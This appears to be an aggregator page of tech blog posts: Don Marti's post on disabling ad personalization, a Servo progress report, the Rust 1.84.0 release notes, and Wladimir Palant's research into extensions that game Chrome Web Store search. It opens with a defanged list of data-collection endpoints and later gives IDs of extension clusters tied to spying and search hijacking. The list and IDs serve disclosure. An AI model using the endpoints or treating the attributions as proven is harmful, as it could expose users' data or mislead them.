Collection endpoints seen in online data, software unknown but likely in third-party software:

  • cykmyk[.]com
  • fenctv[.]com

Collection endpoint in third-party software, identified in 2019 DataSpii research:

  • pnldsk[.]adclarity[.]com

Don MartiClick this to buy better stuff and be happier

Here’s my contender for Internet tip of the year. It’s going to take under a minute, and will not just help you buy better stuff, but also make you happier in general. Ready? Here it is, step by step.

  1. Log in to your Google account if you’re not logged in already. (If you have a Gmail or Google Drive tab open in the browser, you’re logged in.)

  2. Go to My Ad Center.

  3. Find the Personalized ads control. It looks something like this.

Personalized ads on <figcaption>Personalized ads on</figcaption>
  1. Turn it off.
Personalized ads off <figcaption>Personalized ads off</figcaption>
  1. That’s it. Unless you have another Google account. If you do have multiple Google acccounts (like home, school, and work accounts) do this for each one.

This will affect the ads you get on all the Google sites and apps, including Google Search and YouTube, along with the Google ads on other sites. Google is probably going to show you some message to try to discourage you from doing this. From what I can tell from the outside, it looks like turning off personalized ads will cost Google money. Last time I checked, I got the following message.

Ads may seem less relevant When your info isn’t used for ads, you may see fewer ads for products and brands that interest you. Non-personalized ads on Google are shown to you according to factors like the time of day, device type, your current search or the website you’re visiting, or your current location (based on your IP address or device permissions).

But what they don’t say is anything about how personalized ads will help you buy better products and services. And that’s because—and I’m going out on a limb here data-wise, but a pretty short and solid limb, and I’ll explain why—they just don’t. Choosing to turn off personalized ads somehow makes you a more satisfied shopper and better off.

How does this work?

I still don’t know how exactly how this tip works, but so far there have been a few theories.

1: lower fraud risk. It’s possible that de-personalizing the ads reduces the number of scam advertisers who can successfully reach you. Bian et al., in Consumer Surveillance and Financial Fraud, show that Apple App Tracking Transparency, which reduces the ability of apps to personalize ads, tended to reduce fraud complaints to the FTC.

We estimate that the reduction in tracking reduces money lost in all complaints by 4.7% and money lost reported in internet and data security complaints by 40.1%.

That’s a pretty big effect. De-personalizing ads might mean that your employer doesn’t get compromised by an ad campaign that delivers malware targeting a specific company, and you don’t get targeted for fake ads targeted to users of a software product. Even if the increase in fraud risk for users with personalization left on is relatively small, getting scammed has a big impact and can move the average money and happiness metrics a lot.

2: more mindful buying. Another possibility is that people who get fewer personalized ads are making fewer impulse purchases. Jessica Fierro and Corrine Reichert bought a selection of products from those Temu ads that seem to be everywhere, and decided they weren’t worth it. Maybe people without personalized ads are making fewer buying decisions but each one is better thought out.

3. buy more from higher quality vendors. Or maybe companies that put more money into personalized advertising tend to put less into improving product quality.ICMYI: Product is the P all marketers should strive to influence by Mark Ritson In Behavioral advertising and consumer welfare: An empirical investigation, Mustri et al. found that

targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products, compared to competing alternatives found in organic search results

In Why Your Brand Feels Like a Cheap Date: All Flash, No Substance in the World of Performance Marketing, Pesach Lattin writes,

Between 2019 and 2021, brands that focused on brand equity saw a 72% increase in value, compared to just 20% for brands that relied primarily on performance tactics. Ignoring brand-building not only weakens your baseline sales but forces you to spend more and more on performance marketing just to keep your head above water.

Brands that are over-focused on surveillance advertising might be forced to under-invest in product improvements.

4. limited algorithmic and personalized pricing. Personalized ads might be set up to offer the same product at higher prices to some people. The FTC was investigating, but from the research point of view, personalized pricing is really hard to tell apart from dynamic pricing. Even if you get volunteers to report prices, some might be getting a higher price because stock is running low, not because of who the individual is. So it’s hard to show how much impact this has, but hard to rule it out too.

5. it’s just a step on the journey. Another possibility is that de-personalizing the ads is a gateway to blocking ads entirely. What if, without personalization, the ads get gross or annoying enough that people tend to move up to an ad blocker? And, according to Lin et al. in The Welfare Effects of Ad Blocking,

[P]articipants that were asked to install an ad-blocker become less likely to regret recent purchases, while participants that were asked to uninstall their ad-blocker report lower levels of satisfaction with their recent purchases.

Maybe you don’t actually make better buying decisions while ads are on but personalization is off—but it’s a step toward full ad blocking where you do get better stuff and more happiness.

How do I know this works?

I’m confident that this tip works because if turning ad personalization off didn’t help you, Google would have said so a while ago. Remember the 52% paper about third-party cookies? Google made a big deal out of researching the ad revenue impact of turning cookie tracking on or off. And this ad personalization setting also has a revenue impact for Google. According to documents from one of Google’s Federal cases, keeping the number of users with ad personalization off low is a goal for Google—they make more money from you if you have personalization on, so they have a big incentive to try to convince you that personalization is a win-win. So why so quiet? The absence of a PDF about this is just as informative as the actual PDF would be.

And it’s not just Google. Research showing user benefits from personalized ads would be a fairly easy project not just for Google, but for any company that can both check a privacy setting and measure some kind of shopping outcome. Almost as long as Internet privacy tools have been a thing, so has advice from Internet Thought Leaders telling us they’re not a good idea. But for a data-driven industry, they’re bringing surprisingly little data—especially considering that for many companies it’s data they already have and would only need to do stats on, make graphs, and write (or have an LLM write) the abstract and body copy.

Almost any company with a mobile app could do research to show any benefits from ad personalization, too. Are the customers who use Apple iOS and turn off tracking more or less satisfied with their orders? Do banks get more fraud reports from app users with tracking turned on or off? It would be straightforward for a lot of companies to show that turning off personalization or turning on some privacy setting makes you a less happy customer—if it did.

The closest I have found so far is Balancing User Privacy and Personalization by Malika Korganbekova and Cole Zuber. This study simulated the effects of a privacy feature by truncating browsing history for some Wayfair shoppers, and found that people who were assigned to the personalized group and chose a product personalized to them were 10% less likely to return it than people in the non-personalized group. But that’s about a bunch of vendors of similar products that were all qualified by the same online shopping platform, not about the mix of honest and dishonest personalized ads that people get in total. So go back and do the tip if you didn’t already, enjoy your improved shopping experience, and be happy. More: effective privacy tips

Related

You can’t totally turn off ad personalization on Meta sites like Facebook, but there are settings to limit the flow of targeting data in or out. See Mad at Meta? Don’t Let Them Collect and Monetize Your Personal Data by Lena Cohen at the Electronic Frontier Foundation.

B L O C K in the U S A Ad blocking is trending up, and for the first time the people surveyed gave their number one reason as privacy, not annoyance or performance.

MimiOnuoha/missing-datasets: An overview and exploration of the concept of missing datasets. by Mimi Onuoha: That which we ignore reveals more than what we give our attention to. It’s in these things that we find cultural and colloquial hints of what is deemed important. Spots that we’ve left blank reveal our hidden social biases and indifferences.

The $16 hack to blocking ads on your devices for life (I don’t know about the product or the offer, just interesting to see it on a site with ads. Maybe the affiliate revenue is a much bigger deal than the programmatic ad revenue?)

personalization risks In practice, most of the privacy risks related to advertising are the result not of identifying individuals, but of treating different people in the same context differently.

Bonus links

Samuel Bendett and David Kirichenko cover Battlefield Drones and the Accelerating Autonomous Arms Race in Ukraine. Ukrainian officials started to describe their country as a war lab for the future—highlighting for allies and partners that, because these technologies will have a significant impact on warfare going forward, the ongoing combat in Ukraine offers the best environment for continuous testing, evaluation, and refinement of [autonomous] systems. Many companies across Europe and the United States have tested their drones and other systems in Ukraine. At this point in the conflict, these companies are striving to gain battle-tested in Ukraine credentials for their products.

Aram Zucker-Scharff writes, in The bounty hunter tendency, the future of privacy, and ad tech’s new profit frontier., The new generation of laws that are authorizing citizens to become bounty hunters are implicitly tied to the use of surveillance technology. They encourage the use of citizen vs citizen surveillance and create a dangerous environment that worsens the information imbalance between wealthy citizens and everyone else. (Is this a good argument against private right of action in privacy laws? It’s likely that troll lawyers will use existing wiretapping laws against legit news sites, which tend to have long and vulnerable lists of adtech partners.)

Scharon Harding covers TVs at CES 2025. On the one hand, TVs are adding far-field microphones which, um, yikes. But on the other hand, remember how the Microsoft Windows business and gaming market helped drive down the costs of Linux-capable workstation-class hardware? What is the big innovation that developers, designers, and architects will make out of big, inexpensive screens subsidized by the surveillance business?

The Servo BlogThis month in Servo: dark mode, keyword sizes, XPath, and more!

Servo now supports dark mode (@arthmis, @lazypassion, #34532), respecting the platform dark mode in servoshell and ‘prefers-color-scheme’ (@nicoburns, #34423, stylo#93) on Windows and macOS.

servoshell in dark mode, rendering the MDN article for ‘prefers-color-scheme’ in dark mode, when Windows is set to dark mode servoshell in light mode, rendering the MDN article for ‘prefers-color-scheme’ in light mode, when Windows is set to light mode
<figcaption>MDN article for ‘prefers-color-scheme’ in dark mode (left) and light mode (right), with --pref dom.resize_observer.enabled.</figcaption>

CSS transitions can now be triggered properly by script (@mrobinson, #34486), and we now support ‘min-height’ and ‘max-height’ on column flex containers (@Loirooriol, @mrobinson, #34450), ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ in block layout (@Loirooriol, #34641, #34568, #34695), ‘stretch’ on replaced positioned elements (@Loirooriol, #34430), as well as ‘align-self: self-start’, ‘self-end’, ‘left’, and ‘right’ on positioned elements (@taniishkaaa, @Loirooriol, #34365).

Servo can now run Discord well enough to log in and read messages, though you can’t send messages yet. To get this working, we landed some bare-bones AbortController support (@jdm, @syvb, #34519) and a WebSocket fix (@jdm, #34634). Try it yourself with --pref dom.svg.enabled --pref dom.intersection_observer.enabled --pref dom.abort_controller.enabled!

Discord login screen in Servo, showing form input and a QR code that never finishes loading Discord loading screen in Servo, after logging in
Discord channel screen in Servo, showing a few of Diffie’s messages and attachments

We now support console.trace() (@simonwuelker, #34629), PointerEvent (@wusyong, #34437), and the clonable property on ShadowRoot (@simonwuelker, #34514). Shadow DOM support continues to improve (@jdm, #34503), including very basic Shadow DOM layout (@mrobinson, #34701) when enabled via --pref dom.shadowdom.enabled.

script underwent (and continues to undergo) major rework towards being more reliable and faster to build. We’ve landed better synchronisation for DOM tree mutations (@jdm, #34505) and continued work on splitting up the script crate (@jdm, #34366). We’ve moved our ReadableStream support into Servo, eliminating the maintenance burden of a downstream SpiderMonkey patch (@gterzian, @wusyong, @Taym95, #34064, #34675).

The web platform guarantees that same-origin frames and their parents can synchronously observe resizes and their effects. Many tests rely on this, and not doing this correctly made Servo’s test results much flakier than they could otherwise be. We’ve made very good progress towards fixing this (@mrobinson, #34643, #34656, #34702, #34609), with correct resizing in all cases except when a same-origin frame is in another script thread, which is rare.

We now support enough of XPath to get htmx working (@vlindhol, #34463), when enabled via --pref dom.xpath.enabled.

htmx home page in Servo, with the hero banner thing now working (it relies on XPath)

Servo’s performance continues to improve, with layout caching for flex columns delivering up to 12x speedup (@Loirooriol, @mrobinson, #34461), many unnecessary reflows now eliminated (@mrobinson, #34558, #34599, #34576, #34645), reduced memory usage (@mrobinson, @Loirooriol, #34563, #34666), faster rendering for pages with animations (@mrobinson, #34489), and timers now operating without IPC (@mrobinson, #34581).

servoshell nightlies are up to 20% smaller (@atbrakhi, #34340), WebGPU is now optional at build time (@atbrakhi, #34444), and --features tracing no longer enables --features layout-2013 (@jschwe, #34515) for further binary size savings. You can also limit the size of several of Servo’s thread pools with --pref threadpools.fallback_worker_num and others (@jschwe, #34478), which is especially useful on machines with many CPU cores.

We’ve started laying the groundwork for full incremental layout in our new layout engine, starting with a general layout caching mechanism (@mrobinson, @Loirooriol, #34507, #34513, #34530, #34586). This was lost in the switch to our new layout engine, and without it, every time a page changes, we have to rerun layout from scratch. As you can imagine, this is very, very expensive, and incremental layout is critical for performance on today’s highly dynamic web.

Donations

Thanks again for your generous support! We are now receiving 4329 USD/month (+0.8% over November) in recurring donations. With this money, we’ve been able to cover our web hosting and self-hosted CI runners for Windows, Linux, and now macOS builds (@delan, #34868), halving mach try build times from over an hour to under 30 minutes! Next month, we’ll be expanding our CI capacity further, all made possible thanks to your help.

Servo is also on thanks.dev, and already sixteen GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

4329 USD/month
10000

As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

The Rust Programming Language BlogAnnouncing Rust 1.84.0

The Rust team is happy to announce a new version of Rust, 1.84.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.84.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.84.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.84.0 stable

Cargo considers Rust versions for dependency version selection

1.84.0 stabilizes the minimum supported Rust version (MSRV) aware resolver, which prefers dependency versions compatible with the project's declared MSRV. With MSRV-aware version selection, the toil is reduced for maintainers to support older toolchains by not needing to manually select older versions for each dependency.

You can opt-in to the MSRV-aware resolver via .cargo/config.toml:

[resolver]
incompatible-rust-versions = "fallback"

Then when adding a dependency:

$ cargo add clap
    Updating crates.io index
warning: ignoring clap@4.5.23 (which requires rustc 1.74) to maintain demo's rust-version of 1.60
      Adding clap v4.0.32 to dependencies
    Updating crates.io index
     Locking 33 packages to latest Rust 1.60 compatible versions
      Adding clap v4.0.32 (available: v4.5.23, requires Rust 1.74)

When verifying the latest dependencies in CI, you can override this:

$ CARGO_RESOLVER_INCOMPATIBLE_RUST_VERSIONS=allow cargo update
    Updating crates.io index
     Locking 12 packages to latest compatible versions
    Updating clap v4.0.32 -> v4.5.23

You can also opt-in by setting package.resolver = "3" in the Cargo.toml manifest file though that will require raising your MSRV to 1.84. The new resolver will be enabled by default for projects using the 2024 edition (which will stabilize in 1.85).

This gives library authors more flexibility when deciding their policy on adopting new Rust toolchain features. Previously, a library adopting features from a new Rust toolchain would force downstream users of that library who have an older Rust version to either upgrade their toolchain or manually select an old version of the library compatible with their toolchain (and avoid running cargo update). Now, those users will be able to automatically use older library versions compatible with their older toolchain.

See the documentation for more considerations when deciding on an MSRV policy.

Migration to the new trait solver begins

The Rust compiler is in the process of moving to a new implementation for the trait solver. The next-generation trait solver is a reimplementation of a core component of Rust's type system. It is not only responsible for checking whether trait-bounds - e.g. Vec<T>: Clone - hold, but is also used by many other parts of the type system, such as normalization - figuring out the underlying type of <Vec<T> as IntoIterator>::Item - and equating types (checking whether T and U are the same).

In 1.84, the new solver is used for checking coherence of trait impls. At a high level, coherence is responsible for ensuring that there is at most one implementation of a trait for a given type while considering not yet written or visible code from other crates.

This stabilization fixes a few mostly theoretical correctness issues of the old implementation, resulting in potential "conflicting implementations of trait ..." errors that were not previously reported. We expect the affected patterns to be very rare based on evaluation of available code through Crater. The stabilization also improves our ability to prove that impls do not overlap, allowing more code to be written in some cases.

For more details, see a previous blog post and the stabilization report.

Strict provenance APIs

In Rust, pointers are not simply an "integer" or "address". For instance, a "use after free" is undefined behavior even if you "get lucky" and the freed memory gets reallocated before your read/write. As another example, writing through a pointer derived from an &i32 reference is undefined behavior, even if writing to the same address via a different pointer is legal. The underlying pattern here is that the way a pointer is computed matters, not just the address that results from this computation. For this reason, we say that pointers have provenance: to fully characterize pointer-related undefined behavior in Rust, we have to know not only the address the pointer points to, but also track which other pointer(s) it is "derived from".

Most of the time, programmers do not need to worry much about provenance, and it is very clear how a pointer got derived. However, when casting pointers to integers and back, the provenance of the resulting pointer is underspecified. With this release, Rust is adding a set of APIs that can in many cases replace the use of integer-pointer-casts, and therefore avoid the ambiguities inherent to such casts. In particular, the pattern of using the lowest bits of an aligned pointer to store extra information can now be implemented without ever casting a pointer to an integer or back. This makes the code easier to reason about, easier to analyze for the compiler, and also benefits tools like Miri and architectures like CHERI that aim to detect and diagnose pointer misuse.

For more details, see the standard library documentation on provenance.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.84.0

Many people came together to create Rust 1.84.0. We couldn't have done it without all of you. Thanks!

Wladimir PalantHow extensions trick CWS search

A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list:

Screenshot of Chrome Web Store search results listing six extensions. While Norton Password Manager is at the top, the remaining search results like “Vytal - Spoof Timezone, Geolocation & Locale”, “Free VPN - 1VPN” or “Charm - Coupons, Promo Codes, & Discounts” appear completely unrelated. All extensions are marked as featured.

I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon:

Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn’t be due to incompetence, right? What is it then?

Somebody suggested that the extensions somehow managed to pay Google for this placement which seems… well, rather unlikely. For reasons, I came back to this a few weeks ago and decided to take a closer look at the extensions displayed there. These seemed shady, with at least three results being former open source extensions (as in: still claiming to be open source but the code repository linked didn’t contain the current state).

And then I somehow happened to see what it looks like when I change Chrome Web Store language:

Screenshot of Chrome Web Store search results listing the same six extensions. The change in language is visible because the “Featured” badge is now called something else. All extension descriptions are still English however, but they are different. 1VPN calls itself “Browsec vpn urban vpn touch tunnelbear vpn 1click vpn 1clickvpn - 1VPN” and Vytal calls itself “Vytal - Works With 1click VPN & Hotspot VPN”.

Now I don’t claim to know Swahili but what happened here clearly wasn’t translating.

The trick

Google Chrome is currently available in 55 languages. Browser extensions can choose to support any subset of these languages, even though most of them support exactly one. Not only the extension’s user interface can be translated, its name and short description can be made available in multiple languages as well. Chrome Web Store considers such translations according to the user’s selected language. Chrome Web Store also has an extensive description field which isn’t contained within the extension but can be translated.

Apparently, some extension authors figured out that the Chrome Web Store search index is shared across all languages. If you wanted to show up in the search when people look for your competitors for example, you could add their names to your extension’s description – but that might come across as spammy. So what you do instead is sacrificing some of the “less popular” languages and stuff the descriptions there full of relevant keywords. And then your extension starts showing up for these keywords even when they are entered in the English version of the Chrome Web Store. After all, who cares about Swahili other than maybe five million native speakers?

I’ve been maintaining a Github repository with Chrome extension manifests for a while, uploading new snapshots every now and then. Unfortunately, it only contained English names and descriptions. So now I’ve added a directory with localized descriptions for each extension. With that data, most of the issues became immediately obvious – even if you don’t know Swahili.

Screenshot of a JSON listing. The key name is sw indicating Swahili language. The corresponding description starts with “Charm is a lightweight, privacy friendly coupon finder.” Later on it contains a sequence of newlines, followed by a wall of text along the lines of: “GMass: Powerful mail merge for GMail Wikiwand - Wikipedia, and beyond Super dark mode Desktopify”

Update (2025-01-09): Apparently, Google has already been made aware of this issue a year ago at the latest. Your guess is as good as mine as to why it hasn’t been addressed yet.

Who is doing it?

Sifting through the suspicious descriptions and weeding out false positives brought up 920 extensions with bogus “translations” so far, and I definitely didn’t get all of them (see the extension lists). But that doesn’t actually mean hundreds of extension developers. I’ve quickly noticed patterns, somebody applying roughly the same strategy to a large cluster of extensions. For example, European developers tended to “sacrifice” some Asian languages like Bengali whereas developers originating in Asia preferred European languages like Estonian. These strategies were distinctly different from each other and there wasn’t a whole lot of them, so there seems to be a relative low number of parties involved. Some I could even put a name on.

Kodice LLC / Karbon Project LP / BroCode LTD

One such cluster of extensions has been featured on this blog in 2023 already. Back then I listed 108 of their extensions which was only a small sample of their operations. Out of that original sample, 96 extension remain active in Chrome Web Store. And out of these, 81 extensions are abusing translations to improve their ranking in the extension search. From the look of it, all their developers are speaking Russian now – I guess they are no longer hiring in Ukraine. I’ve expanded on the original list a bit, but attribution is unfortunately too time consuming here. So it’s likely way more than the 122 extensions I now list for this cluster.

Back in 2023 some of these extensions were confirmed to spy on users, commit affiliate fraud or inject ads into web pages. The others seemed benign which most likely meant that they were accumulating users and would turn malicious later. But please don’t mention Kodice LLC, Karbon Project LP, BroCode LTD in the context of malicious extensions and Chrome Web Store spam, they don’t like that. In fact, they sent a bogus DMCA takedown notice in an attempt to remove my article from the search engines, claiming that it violates the copyright of the …checks notes… Hacker News page discussing that very article. So please don’t say that Kodice LLC, Karbon Project LP, BroCode LTD are spamming Chrome Web Store with their extensions which would inevitably turn on their users – they are definitely the good guys … sorry, good bros I mean.

PDF Toolbox cluster

Another extension cluster also appeared on this blog before. Back in 2023 an investigation that started with the PDF Toolbox extension brought up 34 malicious extensions. The extensions contained obfuscated code that was hijacking people’s searches and monetizing them by redirecting to Bing. Not that they were limited to it, they could potentially do way more damage.

Note: The PDF Toolbox extension is long gone from Chrome Web Store and unrelated to the extension with the same name available there now.

Google removed all the extensions I reported back then, but whoever is behind them kept busy of course. I found 107 extensions belonging to the same cluster, out of these 100 extensions are on my list due to abusing translations to improve their ranking. I didn’t have the time to do an in-depth analysis of these extensions, but at least one (not on the list) is again doing search hijacking and not even hiding it. The few others I briefly looked at didn’t have any obvious malicious functionality – yet.

Unfortunately, I haven’t come across many clues towards who is behind these extensions. There is a slight indication that these extensions might be related to the BroCode cluster, but that’s far from certain given the significant differences between the two. One thing is certain however: you shouldn’t believe their user numbers, these have clearly been inflated artificially.

ZingFront Software / ZingDeck / BigMData

There is one more huge extensions cluster that I investigated in 2023. Back then I gave up without publishing my findings, in part due to Google’s apparent lack of interest in fighting spam in their add-on store. Lots of websites, lots of fake personas and supposed companies that don’t actually exist, occasionally even business addresses that don’t exist in the real world. There are names like LinkedRadar, FindNiche or SellerCenter, and they aren’t spamming only Chrome Web Store but also mobile app stores and search engines for example. This is clearly a big operation, but initially all I could really tell was that this was the work of people speaking Chinese. Was this a bunch of AI enthusiasts looking to make a quick buck and exchanging ideas?

In the hindsight it took me too long to realize that many of the websites run on ZingFront infrastructure and ZingFront employees are apparently involved. Then things started falling into place, with the clues being so obvious: I found BigMData International PTE. LTD. linked to some of the extensions, ZingDeck Intl LTD. responsible for some of the others. Both companies are located at the same address in Singapore and obviously related. And both appear to be subsidiaries of ZingFront Software, an AI startup in Beijing. ZingDeck claims to have 120 employees, which is quite sufficient to flood Chrome Web Store with hundreds of extensions. Being funded by Baidu Ventures certainly helps as well.

Altogether I could attribute 223 extensions on my list to this cluster. For this article I could not really inspect the functionality of these extensions, but it seems that they are being monetized by selling subscriptions to premium functionality. Same seems to be true for the numerous other offers pushed out by these companies.

I asked ZingFront Software for a comment but haven’t heard back from them so far.

ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz, NioMaker

The extension clusters ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz and NioMaker produce very similar extensions and all seem to be run by Chinese-speaking developers. Some of those might actually be one cluster, or they might all be subdivisions of ZingDeck. Quite frankly, I didn’t want to waste even more time figuring out who is working together and who is competing, so I listed them all separately.

Free Business Apps

This is a large cluster which I haven’t noticed before. It has hundreds of extensions connected to websites like Free Business Apps, PDFWork, DLLPlayer and many more. It contributed “merely” 55 extensions to my list however because the developers of these extensions generally prefer to avoid awkward situations due to mismatched translations. So instead they force the desired (English) keywords into all translations of the extension’s description. This approach is likely aiming for messing up general search engines and not merely Chrome Web Store search. As it is out of scope for this article, only the relatively rare exceptions made my list here.

It isn’t clear who is behind this cluster of extensions. On the one edge of this cluster I found the Ukraine-based Blife LLC, yet their official extensions aren’t linked to the cluster. I asked the company for comment and got a confirmation of what I’ve already suspected after looking at a bunch of court decisions: a previous developer and co-owner left the company, taking some of the assets with him. He now seems to be involved with at least some of the people running this cluster of extensions.

The other edge of the cluster doesn’t seem to be speaking Russian or Ukrainian however, there are instead weak indications that Farsi-speakers are involved. Here I found the Teheran-based Xino Digital, developing some extensions with weak connections to this cluster. While Xino Digital specializes in “Digital Marketing” and “SEO & Organic Traffic,” they seem to lack the resources for this kind of operation. I asked Xino Digital for a comment but haven’t heard back so far.

The approaches

While all extensions listed use translations to mess with Chrome Web Store search, a number of different approaches can be distinguished. Most extensions combine a few of the approaches listed below. Some extension clusters use the same approaches consistently, others vary theirs. I’ve linked to the applying approaches from the extension list.

1. Different extension name

This approach is very popular, likely due to Chrome Web Store search weighting extension name more than its descriptions. So many extensions will use slight variations of their original name depending on the language. Some extensions even go as far as using completely different names, occasionally entirely unrelated to the extension’s purpose – all to show up prominently in searches.

2. Different short description

Similarly, some extensions contain different variants of their short description for various languages. The short description typically doesn’t change much and is only used to show up for a bunch of related search keywords. A few extensions replaced their short description for some languages with a list of keywords however.

3. Using competitors’ names

In some cases I noticed extensions using names of their competitors or other related products. Some would go as far as “rename” themselves into a competing product in some languages. In other cases this approach is made less obvious, e.g. when extension descriptions provide lists of “alternatives” or “compatible extensions.” I haven’t flagged this approach consistently, simply because I don’t always know who the competitors are.

4. Considerably more extensive extension description

Some extensions have a relatively short and concise English description, yet the “translation” into some other languages is a massive wall of text, often making little sense. Sometimes a translation is present, but it is “extended” with a lengthy English passage. In other scenarios only English text is present. This text only seems to exist to place a bunch of keywords.

Note that translation management in Chrome Web Store is quite messy, so multiple variants of the English translation aren’t necessarily a red flag – these might have simply been forgotten. Consequently, I tried to err in favor of extension authors when flagging this approach.

5. Keywords at the end of extension description

A very popular approach is taking a translation (or an untranslated English description), then adding a long list of keywords and keyphrases to the end of it in some languages. Often this block is visually separated by a bunch of empty lines, making sure people actually reading the description in this language aren’t too confused.

6. Keywords within the extension description

A more stealthy approach is hiding the keywords within the extension description. Some extensions will use slight variations of the same text, only differing in one or two keywords. Others use automated translations of their descriptions but place a bunch of (typically English) keywords in these translations. Occasionally there is a translation which is broken up by a long list of unrelated keywords.

7. Different extension description

In a few cases the extension description just looked like a completely unrelated text. Sometimes it seemed to be a copy of a description from a competing extension, other times it made no sense whatsoever.

And what should Google do about it?

Looking at Chrome Web Store policy on spam and abuse, the formulation is quite clear:

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store.

So Google can and should push back on this kind of manipulation. At the very least, Google might dislike the fact that there are currently at least eleven extensions named “Google Translate” – at least in some languages. In fact, per the same policy Google isn’t even supposed to tolerate spam in Chrome Web Store:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, Google hasn’t been very keen on enforcing this policy in the past.

There is also a possible technical solution here. By making Chrome Web Store search index per-language, Google could remove the incentives for this kind of manipulation. If search results for Bengali no longer show up in English-language searches, there is no point messing up the Bengali translation any more. Of course, searching across languages is a feature – yet this feature isn’t worth it if Google cannot contain the abuse by other means.

Quite frankly, I feel that Google should go beyond basic containment however. The BroCode and PDF Toolbox clusters are known to produce malicious extensions. These need to be monitored proactively, and the same kind of attention might be worth extending to the other extension clusters as well.

The extensions in question

One thing up front: Chrome Web Store is messy. There are copycats, pretenders, scammers. So attribution isn’t always a straightforward affair, and there might occasionally be an extension attributed to one of the clusters which doesn’t belong there. It’s way more common that an extension isn’t sorted into its cluster however, simply because the evidence linking it to the cluster isn’t strong enough, and I only had limited time to investigate.

The user counts listed reflect the state on December 13, 2024.

Kodice / Karbon Project / BroCode

Name Weekly active users Extension ID Approaches
What Font - find font & color 125 abefllafeffhoiadldggcalfgbofohfa 1, 2, 4
Video downloader web 1,000,000 acmbnbijebmjfmihfinfipebhcmgbghi 1, 2, 4
Picture in Picture - Floating player 700,000 adnielbhikcbmegcfampbclagcacboff 1, 2, 4
Floating Video Player Sound Booster 600,000 aeilijiaejfdnbagnpannhdoaljpkbhe 1, 2, 4
Sidebarr - ChatGPT, bookmarks, apps and more 100,000 afdfpkhbdpioonfeknablodaejkklbdn 1, 2, 5
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo 1, 2
Cute Cursors - Custom Cursor for Chrome™ 1,000,000 anflghppebdhjipndogapfagemgnlblh 4
Adblock for Youtube - skip ads 800,000 annjejmdobkjaneeafkbpipgohafpcom 1, 2, 3, 4
Translator, Dictionary - Accurate Translate 800,000 bebmphofpgkhclocdbgomhnjcpelbenh 1, 2, 3, 4
Screen Capture, Screenshot, Annotations 500,000 bmkgbgkneealfabgnjfeljaiegpginpl 1, 2
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi 1, 2
Sound Booster - Volume Control 3,000,000 ccjlpblmgkncnnimcmbanbnhbggdpkie 1, 2, 4, 6
Web Client for Instagram™ - Sidegram 200,000 cfegchignldpfnjpodhcklmgleaoanhi 1, 2
Paint Tool for Chrome 200,000 coabfkgengacobjpmdlmmihhhfnhbjdm 1, 2, 4
History & Cache Cleaner - Smart Clean 2,000 dhaamkgjpilakclbgpabiacmndmhhnop 1, 2
Screenshot & Screen Video Record by Screeny 2,000,000 djekgpcemgcnfkjldcclcpcjhemofcib 1, 2, 4
Video Downloader for U 3,000,000 dkbccihpiccbcheieabdbjikohfdfaje 4
Multi Chat - Messenger for WhatsApp 2,000,000 dllplfhjknghhdneiblmkolbjappecbe 1, 2, 3, 7
Night Shift Mode 200,000 dlpimjmonhbmamocpboifndnnakgknbf 1, 2, 4
Music Downloader - VKsaver 500,000 dmbjkidogjmmlejdmnecpmfapdmidfjg 1, 2, 4
Daily Tab - New tab with ChatGPT 1,000 dnbcklfggddbmmnkobgedggnacjoagde 1, 2, 4
Web Color Picker - online color grabber 1,000,000 dneifdhdmnmmlobjbimlkcnhkbidmlek 1, 3, 4
Paint - Drawings Easy 300,000 doiiaejbgndnnnomcdhefcbfnbbjfbib 1, 2, 4, 6
Block Site - Site Blocker & Focus Mode 2,000,000 dpfofggmkhdbfcciajfdphofclabnogo 1, 2, 3, 4
2048 Online Classic game 200,000 eabhkjojehdleajkbigffmpnaelncapp 1, 2
Gmail Notifier - gmail notification tool 100,000 ealojglnbikknifbgleaceopepceakfn 6
Volume Recorder Online 1,000,000 ebdbcfomjliacpblnioignhfhjeajpch 1, 2, 4, 6
Volume Booster - Sound & Bass boost 1,000,000 ebpckmjdefimgaenaebngljijofojncm 1, 2, 4, 6
Screenshot Tool - Screen Capture & Editor 1,000,000 edlifbnjlicfpckhgjhflgkeeibhhcii 1, 2, 4, 6
Tabrr Dashboard - New Tab with ChatGPT 300,000 ehmneimbopigfgchjglgngamiccjkijh 6
New Tab for Google Workspace™ 200,000 ehpgcagmhpndkmglombjndkdmggkgnge 1, 4, 5
Equalizer - Bass Booster Master 200,000 ejigejogobkbkmkgjpfiodlmgibfaoek 1, 2, 4, 6
Paint 300,000 ejllkedmklophclpgonojjkaliafeilj 1, 4
Online messengers in All-in-One chat 200,000 ekjogkoigkhbgdgpolejnjfmhdcgaoof 2, 4, 6
Ultimate Video Downloader 700,000 elpdbicokgbedckgblmbhoamophfbchi 2
Translate for Chrome -Translator, Dictionary 500,000 elpmkbbdldhoiggkjfpgibmjioncklbn 1, 2, 3
